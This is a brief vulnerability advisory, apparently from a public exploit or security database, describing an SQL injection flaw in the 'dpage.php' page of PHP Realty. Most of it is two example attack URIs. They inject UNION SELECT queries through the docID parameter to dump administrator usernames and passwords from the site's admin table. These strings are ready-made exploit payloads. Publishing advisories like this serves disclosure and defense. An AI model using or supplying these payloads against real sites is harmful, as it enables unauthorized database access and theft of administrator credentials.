PHP Realty 'dpage.php' SQL Injection Vulnerability

PHP Realty 'dpage.php' SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following example URIs are available:

http://www.example.com/path/dpage.php?docID=-1 UNION SELECT 1,2,concat(Username,0x3a,Password) FROM admin--
http://www.example.com/path/dpage.php?docID=-9999+union+all+select+1,2,group_concat(Username,char(58),Password)v3n0m+from+admin--